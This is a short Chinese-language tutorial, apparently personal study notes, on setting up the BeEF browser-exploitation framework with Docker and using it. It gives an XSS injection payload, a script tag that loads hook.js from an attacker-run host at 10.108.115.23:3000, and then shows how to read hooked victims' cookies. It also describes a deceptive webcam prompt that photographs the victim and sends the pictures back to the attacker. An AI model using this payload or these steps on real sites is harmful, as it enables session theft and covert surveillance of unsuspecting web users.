安装

docker:
https://hub.docker.com/r/ilyaglow/beef/

下载镜像:
sudo docker pull ilyaglow/beef

使用:
sudo docker run -it -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 ilyaglow/beef

下次再开启就用:
sudo docker start id 命令就可以了

访问:
BeEF will be available at http://localhost:3000/ui/panel

一些网址

官网:http://beefproject.com

github:https://github.com/beefproject/beef

使用

  • 最简单地hook

在存在xss攻击的地方输入:
<script src="http://10.108.115.23:3000/hook.js"></script>
或者电脑访问:http://10.108.115.23:3000/demos/basic.html
就会被hook到~

  • 一些眼见为实的尝试

直接在current browser->details就可以看到网站的一些信息,包括cookie等:

还可以在current browser->Commands->Browser->Hooked Domain中获得的一些额外信息:

current browser->Commands->Host->Hook Default Browser。会在你被hook的浏览器上打开一个空白的pdf

current browser->Commands->Browser->Webcam会在你的浏览器上打开一个网页,上面写着欺骗信息,欺骗你点击下面对话框中的webcam申请权限的确定,如果你点击了确定,摄像头会自动打开,拍摄照片并回传到beef中:

results matching ""

    No results matching ""